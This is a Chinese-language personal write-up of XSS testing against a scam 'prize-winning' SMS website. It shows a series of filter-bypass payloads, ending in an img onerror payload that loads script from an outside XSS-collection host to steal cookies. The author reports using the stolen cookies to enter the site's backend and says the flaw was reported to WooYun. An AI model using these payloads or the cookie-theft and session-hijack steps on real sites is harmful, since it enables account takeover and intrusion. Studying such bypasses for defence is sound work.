一次收到”中奖短信“后的XSS测试

起因

前几天上课的时候,忽然收到一条短信

打开网址如下:

既然我有如此“运气”,就让我看看葫芦里卖的什么药吧!

过程

测试

随手x了一句

<script>alert(1)</script>

发现报错了,我以为是对“script整个标签”进行了过滤(后来发现仅仅是对script进行过滤),然后就进行继续尝试。

<scr<script>ipt>alert(1)</scr<script>ipt>

发现还是报错,然后考虑是不是只过滤script这个字符串,然后考虑用img标签进行尝试。

<img src="#" onerror="alert(1)">

然后出现了我等待已久的弹窗

绕过

然后中午回去准备添加盗取cookies的代码,结果发现怎么都过不去,有一个点一直想不通,就是不知道对方到底过滤了什么,然后js填进去一直报错,我就一直想不通怎么在onerror事件里面让js生效,后来请教了好多人,得到的结果一直是没办法,这个没什么可x的,得不到什么结果,然后就放在一旁了,结果今天在论天逛的时候,发现了Black-Hole他的一篇文章里面提到了这种用法,我一下子眼前一亮,然后知道了怎么添加js。然后就是登陆平台添加了一下盗取cookies代码,然后结合上文对过滤猜测的失误,我在想是不是仅仅是对script这个字符串进行了过滤,然后把t换成了&#116

<img src=xonerror=appendChild(createElement ('scrip&#116')).src='http://xss.0exp.cn/VdYVBx?1448952953'/>

然后显示订单成功

得到cookies

打进去以后不一会,就收到cookies了

登陆后台

然后就拖入老兵,进行访问。

最后想说

本文只做个人技术总结,并无宣扬对厂商造成破坏之意,且本漏洞已提交至乌云并已公开:

http://www.wooyun.org/bugs/wooyun-2015-0157351

如有不妥之处,请联系我,必将配合删除,至此告之。